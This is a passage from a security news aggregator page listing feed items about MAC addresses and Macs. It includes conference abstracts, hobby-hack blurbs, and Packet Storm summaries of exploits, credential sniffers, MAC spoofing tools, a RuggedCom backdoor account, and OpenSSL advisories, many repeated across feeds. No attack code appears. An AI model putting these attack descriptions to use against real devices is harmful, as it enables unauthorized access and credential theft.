DHCP, IPX, IPv6, etc which up to now was not possible and therefore comes as a big plus. On the other hand there were little if none diagnostic tools at all for routing on that level so we had to go back one step and develop the tools we needed ourselves. These and other things we will cover in our presentation and also give an outlook into the future of mesh-routing, which will bring it even closer to the source of wifi - the wireless stack and its drivers and thereby improving the overall performance even more.
-
14:55
»
SecDocs
Authors:
Simon Wunderlich Tags:
wireless Event:
Chaos Communication Congress 24th (24C3) 2007 Abstract: Kernel hacking definitely is the queen of coding but in order to bring mesh routing that one vital step further we had to conquer this, for us, unchartered territory. Working in the kernel itself is a tough and difficult task to manage, but the results and effectivity to be gained justify the long and hard road to success. We took on the mission to go down that road and the result is B.A.T.M.A.N. advanced which is a kernel land implementation of the B.A.T.M.A.N. mesh routing protocol specifically designed to manage Wireless MANs. During the last years the number of deployed mesh networks has increased dramatically and their constant growth drove us around the edge of what we thought was possible. To cope with this rapid development we had to leave the slow and limited track of tweaking existing approaches and take an evolutionary step forward by porting the B.A.T.M.A.N. protocol into the kernel land and going down to layer 2. Using B.A.T.M.A.N. advanced as a showcase we will, in our lecture, deliver a detailed review on how one can go about developing linux kernel modules, give insights in what difficulties to expect and provide practical tips on how to go about this challenge without experiencing a damaging kernel freeze in due process. We will describe what problems we faced migrating down to layer 2 and how we went about solving them for example how we moved away from the kernel routing and handle the actual routing and data transport in B.A.T.M.A.N. itself. Also moving to layer 2 meant to leave IPs behind and solely rely on MAC-routing enabling features like DHCP, IPX, IPv6, etc which up to now was not possible and therefore comes as a big plus. On the other hand there were little if none diagnostic tools at all for routing on that level so we had to go back one step and develop the tools we needed ourselves. These and other things we will cover in our presentation and also give an outlook into the future of mesh-routing, which will bring it even closer to the source of wifi - the wireless stack and its drivers and thereby improving the overall performance even more.
-
-
15:19
»
Wirevolution
You know from a previous post how 802.11n gets to 600 megabits per second. 802.11ac does just three things to increase that by 1,056%:
-
It adds a new Modulation and Coding Scheme (MCS) called 256-QAM. This increases the number of bits transmitted per symbol from 6 to 8, a factor of 1.33.
- It increases the maximum channel width from 40 MHz to 160 MHz (160 MHz is optional, but 80 MHz support is mandatory.) This increases the number of subcarriers from 108 to 468, a factor of 4.33.
- It increases the maximum MIMO configuration from 4×4 to 8×8, increasing the number of spatial streams by a factor of 2. Multi-User MIMO (MU-MIMO) with beamforming means that these spatial streams can be directed to particular clients, so while the AP may have 8 antennas, the clients can have less, for example 8 clients each with one antenna.
Put those factors together and you have 1.33 x 4.33 x 2 = 11.56. Multiply the 600 megabits per second of 802.11n by that factor and you get 600 x 11.56 = 6,933 megabits per second for 802.11ac.
Note that nobody does this yet, and 160 MHz channels and 8×8 MIMO are likely to remain unimplemented for a long time. For example Broadcom’s recently announced BCM4360 and Qualcomm’s QCA9860 do 80 MHz channels, not 160 MHz, and 3 x 3 MIMO, so they claim maximum raw bit-rates of 1.3 gigabits per second. Which is still impressive.
Maximum theoretical raw bit-rate is a fun number to talk about, but of course in the real world that will (almost) never happen. What’s more important is the useful throughput (raw bit-rate minus MAC overhead) and rate at range, the throughput you are likely to get at useful distances. This is very difficult, and it is where the manufacturers can differentiate with superior technology. For phone chips power efficiency is also an important differentiator.
-
-
14:59
»
Packet Storm Security Exploits
Edimax version IC-3030iWn web administrative authentication bypass exploit. Written to use on a Mac. This also affects Edimax IC-3015 and Airlive WN 500.
-
14:59
»
Packet Storm Security Recent Files
Edimax version IC-3030iWn web administrative authentication bypass exploit. Written to use on a Mac. This also affects Edimax IC-3015 and Airlive WN 500.
-
14:59
»
Packet Storm Security Misc. Files
Edimax version IC-3030iWn web administrative authentication bypass exploit. Written to use on a Mac. This also affects Edimax IC-3015 and Airlive WN 500.
-
-
9:57
»
Packet Storm Security Recent Files
Intercepter is a sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
9:57
»
Packet Storm Security Tools
Intercepter is a sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
9:57
»
Packet Storm Security Misc. Files
Intercepter is a sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
-
12:01
»
Hack a Day
A few months ago [Antti Palosaari] discovered cheap USB TV tuners could be used as a software-defined radio. Since then, we’ve seen these TV tuners receive signals from GPS satellites and even the signals between air traffic control and passenger aircraft. Like everything cool, Mac support for these drivers is slightly terrible so [hpux735] wrote his own [...]
-
-
21:40
»
SecDocs
Authors:
Steven J. Murdoch Tags:
bank smart card Event:
Chaos Communication Congress 27th (27C3) 2010 Abstract: EMV is the dominant protocol used for smart card payments worldwide, with over 730 million cards in circulation. Known to bank customers as “Chip and PIN”, it is used in Europe; it is being introduced in Canada; and there is pressure from banks to introduce it in the USA too. EMV secures credit and debit card transactions by authenticating both the card and the customer presenting it through a combination of cryptographic authentication codes, digital signatures, and the entry of a PIN. In this paper we describe and demonstrate a protocol flaw which allows criminals to use a genuine card to make a payment without knowing the card’s PIN, and to remain undetected even when the merchant has an online connection to the banking network. The fraudster performs a man-in-the-middle attack to trick the terminal into believing the PIN verified correctly, while telling the issuing bank that no PIN was entered at all. The paper considers how the flaws arose, why they remained unknown despite EMV’s wide deployment for the best part of a decade, and how they might be fixed. Because we have found and validated a practical attack against the core functionality of EMV, we conclude that the protocol is broken. This failure is significant in the field of protocol design, and also has important public policy implications, in light of growing reports of fraud on stolen EMV cards. Frequently, banks deny such fraud victims a refund, asserting that a card cannot be used without the correct PIN, and concluding that the customer must be grossly negligent or lying. Our attack can explain a number of these cases, and exposes the need for further research to bridge the gap between the theoretical and practical security of bank payment systems. Smart cards have gradually replaced magnetic strip cards for point-of-sale and ATM transactions in many countries. The leading system, EMV (named after Europay, MasterCard, and Visa), has been deployed throughout most of Europe, and is currently being rolled out in Canada. As of early 2008, there were over 730 million EMV compliant smart cards in circulation worldwide. In EMV, customers authorize a credit or debit card transaction by inserting their card and entering a PIN into a point-of-sale terminal; the PIN is typically verified by the smart card chip, which is in turn authenticated to the terminal by a digital certificate. The transaction details are also authenticated by a cryptographic message authentication code (MAC), using a symmetric key shared between the payment card and the bank that issued the card to the customer (the issuer). EMV was heavily promoted under the “Chip and PIN” brand during its national rollout in the UK. The technology was advertised as a solution to increasing card fraud: a chip to prevent card counterfeiting, and a PIN to prevent abuse of stolen cards. Since its introduction in the UK the fraud landscape has changed significantly: lost and stolen card fraud is down, and counterfeit card fraud experienced a two year lull. But no type of fraud has been eliminated, and the overall fraud levels have actually risen (see Figure 1). The likely explanation for this is that EMV has simply moved fraud, not eliminated it. One goal of EMV was to externalise the costs of dispute from the issuing bank, in that if a disputed transaction has been authorised by a manuscript signature, it would be charged to the merchant, while if it had been authorised by a PIN then it would be charged to the customer. The net effect is that the banking industry, which was responsible for the design of the system, carries less liability for the fraud. The industry describes this as a ‘liability shift’. In the past few years, the UK media have reported numerous cases where cardholders’ complaints have been rejected by their bank and by government-approved mediators such as the Financial Ombudsman Service, using stock excuses such as ‘Your card was CHIP read and a PIN was used so you must have been negligent.’ Interestingly, an increasing number of complaints from believable witnesses indicate that their EMV cards were fraudulently used shortly after being stolen, despite there having been no possibility that the thief could have learned the PIN. In this paper, we describe a potential explanation. We have demonstrated how criminals can use stolen “Chip and PIN” (EMV) smart cards without knowing the PIN. Since “verified by PIN” – the essence of the system – does not work, we declare the Chip and PIN system to be broken.
-
-
10:22
»
Packet Storm Security Exploits
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
10:22
»
Packet Storm Security Recent Files
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
10:22
»
Packet Storm Security Misc. Files
An undocumented backdoor account exists within all released versions of RuggedCom's Rugged Operating System (ROS®). The username for the account, which cannot be disabled, is "factory" and its password is dynamically generated based on the device's MAC address. Multiple attempts have been made in the past 12 months to have this backdoor removed and customers notified. Exploit included.
-
-
21:32
»
SecDocs
Authors:
Harald Welte Tags:
GSM phone Event:
Chaos Communication Congress 28th (28C3) 2011 Abstract: Almost everyone uses the packet oriented transmission modes of cellular networks. However, unlike TCP/IP, Ethernet and Wifi, not many members of the hacker commnunity are familiar with the actual protocol stack for those services. This talk is aimed to give an in-depth explanation how the lower layer protocols on the air and wired interfaces for packet data services in cellular networks are structured. For 2.5/2.75G, this includes RLC/MAC, NS, BSSGP, LLC, SNDCP, GTP For 3G/3.5G, this includes RRC, RLC, PDCP, NBAP, RANAP
-
21:32
»
SecDocs
Authors:
Harald Welte Tags:
GSM phone Event:
Chaos Communication Congress 28th (28C3) 2011 Abstract: Almost everyone uses the packet oriented transmission modes of cellular networks. However, unlike TCP/IP, Ethernet and Wifi, not many members of the hacker commnunity are familiar with the actual protocol stack for those services. This talk is aimed to give an in-depth explanation how the lower layer protocols on the air and wired interfaces for packet data services in cellular networks are structured. For 2.5/2.75G, this includes RLC/MAC, NS, BSSGP, LLC, SNDCP, GTP For 3G/3.5G, this includes RRC, RLC, PDCP, NBAP, RANAP
-
-
21:27
»
Packet Storm Security Exploits
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
21:27
»
Packet Storm Security Recent Files
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
21:27
»
Packet Storm Security Misc. Files
The D-Link DSL-2640B ADSL router suffers from a simple authentication bypass vulnerability by spoofing the MAC address of a logged in administrator.
-
-
11:01
»
Hack a Day
[Bradley Gawthrop's] biggest gripe about his laser cutter is the lack of Mac support. We don’t think we’d have any gripes if we owned one of these (yeah, that’s a lie…) but we can understand his second biggest issue which is the inability to see the work piece once it’s inside the machine. He figured [...]
-
-
17:10
»
Packet Storm Security Recent Files
The cryptographic algorithm called INCrypt32 is a MAC algorithm to authenticate participants, RFID cards and readers, in HID Global's iCLASS systems. HID's iCLASS cards are widely used contactless smart cards for physical access control. Although INCrypt32 is a heart of the security of HID's iCLASS systems, its security has not been evaluated yet since the specification has not been open to public. In this paper, they reveal the specification of INCrypt32 by reverse engineering an iCLASS card and investigate the security of INCrypt32. As a result, we show that the secret key of size 64 bits can be recovered using only 218 MAC queries if the attacker can request MAC for chosen messages of arbitrary length. If the length of messages is limited to pre-determined values by the authentication protocol, the required number of MAC queries grows to 242 to recover the secret key.
-
17:10
»
Packet Storm Security Misc. Files
The cryptographic algorithm called INCrypt32 is a MAC algorithm to authenticate participants, RFID cards and readers, in HID Global's iCLASS systems. HID's iCLASS cards are widely used contactless smart cards for physical access control. Although INCrypt32 is a heart of the security of HID's iCLASS systems, its security has not been evaluated yet since the specification has not been open to public. In this paper, they reveal the specification of INCrypt32 by reverse engineering an iCLASS card and investigate the security of INCrypt32. As a result, we show that the secret key of size 64 bits can be recovered using only 218 MAC queries if the attacker can request MAC for chosen messages of arbitrary length. If the length of messages is limited to pre-determined values by the authentication protocol, the required number of MAC queries grows to 242 to recover the secret key.
-
-
15:24
»
Packet Storm Security Recent Files
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers. These tools include bruteforcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
15:24
»
Packet Storm Security Tools
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers. These tools include bruteforcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
15:24
»
Packet Storm Security Misc. Files
WOL-E is a suite of tools for the Wake on LAN feature of network attached computers, this is now enabled by default on many Apple computers. These tools include bruteforcing the MAC address to wake up clients, sniffing WOL attempts and passwords, scanning for Apple devices and more.
-
-
17:20
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-007 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The GOST ENGINE in OpenSSL before 1.0.0f does not properly handle invalid parameters for the GOST block cipher, which allows remote attackers to cause a denial of service via crafted data from a TLS client. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Advisories
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Recent Files
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
17:20
»
Packet Storm Security Misc. Files
Mandriva Linux Security Advisory 2012-006 - The DTLS implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. Double free vulnerability in OpenSSL 0.9.8 before 0.9.8s, when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to have an unspecified impact by triggering failure of a policy check. The SSL 3.0 implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly initialize data structures for block cipher padding, which might allow remote attackers to obtain sensitive information by decrypting the padding data sent by an SSL peer. The Server Gated Cryptography implementation in OpenSSL before 0.9.8s and 1.x before 1.0.0f does not properly handle handshake restarts, which allows remote attackers to cause a denial of service via unspecified vectors. The updated packages have been patched to correct these issues.
-
-
18:59
»
Packet Storm Security Advisories
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
-
18:59
»
Packet Storm Security Recent Files
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
-
18:59
»
Packet Storm Security Misc. Files
Debian Linux Security Advisory 2390-1 - Several vulnerabilities were discovered in OpenSSL, an implementation of TLS and related protocols. The DTLS implementation performs a MAC check only if certain padding is valid, which makes it easier for remote attackers to recover plaintext via a padding oracle attack. A double free vulnerability when X509_V_FLAG_POLICY_CHECK is enabled, allows remote attackers to cause applications crashes and potentially allow execution of arbitrary code by triggering failure of a policy check. On 32-bit systems, the operations on NIST elliptic curves P-256 and P-384 are not correctly implemented, potentially leaking the private ECC key of a TLS server. (Regular RSA-based keys are not affected by this vulnerability.) Various other issues were also addressed.
-
-
13:25
»
Hack a Day
[Ricard Dias] wrote in to tell us about his guide for developing Linux applications on a Mac. He really enjoys the development environment provided by XCode, and it doesn’t take much to make it work as an all-in-one solution for Linux development. The real trick here is the use of SSH to access a Linux [...]
-
-
6:04
»
Packet Storm Security Recent Files
Technitium MAC Address Changer allows you to change Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.
-
6:04
»
Packet Storm Security Misc. Files
Technitium MAC Address Changer allows you to change Media Access Control (MAC) Address of your Network Interface Card (NIC) irrespective to your NIC manufacturer or its driver. It has a very simple user interface and provides ample information regarding each NIC in the machine.
-
-
16:48
»
Packet Storm Security Recent Files
A MAC changing utility that uses both ifconfig and GNU-Macchanger (checks if mac changer exists, if not, uses ifconfig) to spoof ones MAC with a totally random value. Written in Python.
-
16:48
»
Packet Storm Security Tools
A MAC changing utility that uses both ifconfig and GNU-Macchanger (checks if mac changer exists, if not, uses ifconfig) to spoof ones MAC with a totally random value. Written in Python.
-
16:48
»
Packet Storm Security Misc. Files
A MAC changing utility that uses both ifconfig and GNU-Macchanger (checks if mac changer exists, if not, uses ifconfig) to spoof ones MAC with a totally random value. Written in Python.
-
-
10:17
»
Packet Storm Security Recent Files
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
10:17
»
Packet Storm Security Tools
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
10:17
»
Packet Storm Security Tools
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
10:17
»
Packet Storm Security Misc. Files
0x4553-Intercepter is a WinPcap-based sniffer that offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.
-
-
15:01
»
Hack a Day
As a new recruit to the 68k Macintosh Liberation Army, [dougg3] is really showing off his hardware hacking ability. He came up with a replacement ROM SIMM for his Mac IIci and made it play the Mario theme on boot instead of the normal chimes. Swapping out the ROM in these old macs isn’t an [...]
-
11:52
»
SecDocs
Authors:
Brad Hill Rachel Engel Scott Stender Tags:
Kerberos Event:
Black Hat USA 2010 Abstract: The Kerberos protocol is provides single sign-on authentication services for users and machines. Its availability on nearly every popular computing platform - Windows, Mac, and UNIX variants - makes it the primary choice for enterprise authentication. However, simply "adding a dash of Kerberos" does not make a magically secure a network. Kerberos is a complicated protocol whose comprehensive description requires dozens of RFCs. To use it securely requires a careful dance between protocol designers, service developers, and system administrators – the kind of dance that never quite stays in step. A careful review of RFCs, deployment guidance, and developer reference materials reveals a host of “theoretical” flaws when Kerberos is used. This presentation will demonstrate new techniques that make the theoretical practical in common Kerberos deployments, and provide guidance to ensure that software and systems are hardened against attack.
-
11:52
»
SecDocs
Authors:
Brad Hill Rachel Engel Scott Stender Tags:
Kerberos Event:
Black Hat USA 2010 Abstract: The Kerberos protocol is provides single sign-on authentication services for users and machines. Its availability on nearly every popular computing platform - Windows, Mac, and UNIX variants - makes it the primary choice for enterprise authentication. However, simply "adding a dash of Kerberos" does not make a magically secure a network. Kerberos is a complicated protocol whose comprehensive description requires dozens of RFCs. To use it securely requires a careful dance between protocol designers, service developers, and system administrators – the kind of dance that never quite stays in step. A careful review of RFCs, deployment guidance, and developer reference materials reveals a host of “theoretical” flaws when Kerberos is used. This presentation will demonstrate new techniques that make the theoretical practical in common Kerberos deployments, and provide guidance to ensure that software and systems are hardened against attack.
-
-
18:01
»
Packet Storm Security Recent Files
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
18:01
»
Packet Storm Security Tools
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
18:01
»
Packet Storm Security Tools
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
18:01
»
Packet Storm Security Misc. Files
Multi Threaded TCP Port Scanner allows you to scan 65535 TCP ports on an IP address. You can specify how many threads to run and the timeout. Furthermore, it will tell you the MAC address of the target and the services that are running. You can scan IP addresses on your network and find out which open ports you have.
-
-
14:05
»
Hack a Day
[Steve] over at Big Mess O’ Wires has never been so happy to see the “Sad Mac” icon. A little over a month ago, he decided to take on the task of building his own Mac clone using modern technology. Not to be confused with Mac emulation on modern hardware, he is attempting to build [...]
-
-
15:00
»
Sophos security news
Anti-Virus software for Mac delivers complete security and support for business and home users of popular Mac operating systems
-
-
9:01
»
Hack a Day
When [Liu] decided he wanted one of the new iPads, rather than fork out the cash he decided to build his own tablet Mac. His creation functions just as you would expect any tablet PC with some nice extra features such as running on Windows XP for any of you Microsoft lovers. [Lui’s] tablet apparently [...]
-
-
23:28
»
Sophos product advisories
If you install SafeGuard Disk Encryption for Mac 5.50.1 on Mac OS X 10.7 (Lion), Mac OS X 10.7 will no longer start. Instead the computer boots up into the Mac OS X Recovery partition.
-
-
9:05
»
Hack a Day
Here’s a way to gain control of your projects using an Android device. Bluescripts is a free app available in the Android market that makes it a bit easier to make interfaces to send customizable messages. If you have a Bluetooth receiver in your project, connecting to it is as easy as putting the MAC [...]
-
-
6:06
»
Hack a Day
[Phillip Torrone] gave us a heads up about a project he and [Limor Fried] along with [Mike Doell] have just wrapped up. Their aptly-named “iCufflinks” softly pulsate with light the same way in which you see many Mac products do. The cufflinks are made from machined aluminum and have the ubiquitous “power symbol” milled into [...]
-
-
19:15
»
Packet Storm Security Advisories
Secunia Security Advisory - Two vulnerabilities have been reported in Microsoft Office for Mac, which can be exploited by malicious people to compromise a user's system.
-
19:34
»
Packet Storm Security Recent Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:34
»
Packet Storm Security Tools
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
19:34
»
Packet Storm Security Misc. Files
Mpctp is a tool for manipulation of raw packets that allows a large number of options. Its primary purpose is to diagnose and test several scenarios that involving the use of the types of TCP/IP packets. It is able to send certain types of packets to any specific target and manipulations of various fields at runtime. These fields can be modified in its structure as the the Source/Destination IP address and Source/Destination MAC address.
-
-
21:44
»
Packet Storm Security Advisories
Secunia Security Advisory - A vulnerability has been reported in Skype for Mac, which can be exploited by malicious people to compromise a user's system.
-
-
8:49
»
Packet Storm Security Advisories
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
8:49
»
Packet Storm Security Recent Files
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
8:49
»
Packet Storm Security Misc. Files
iDefense Security Advisory 04.12.11 - Remote exploitation of a memory corruption vulnerability in Microsoft Corp.'s Excel could allow an attacker to execute arbitrary code with the privileges of the current user. The vulnerability occurs when Excel parses a specially crafted Excel file. Specific values within this file can trigger a memory corruption vulnerability and may allow arbitrary code execution. The following Microsoft products are vulnerable: Excel 2002 SP3, Excel 2002 SP3, Excel 2003 SP3, Office 2004 for Mac, Office 2008 for Mac, Open XML File Format Converter for Mac.
-
-
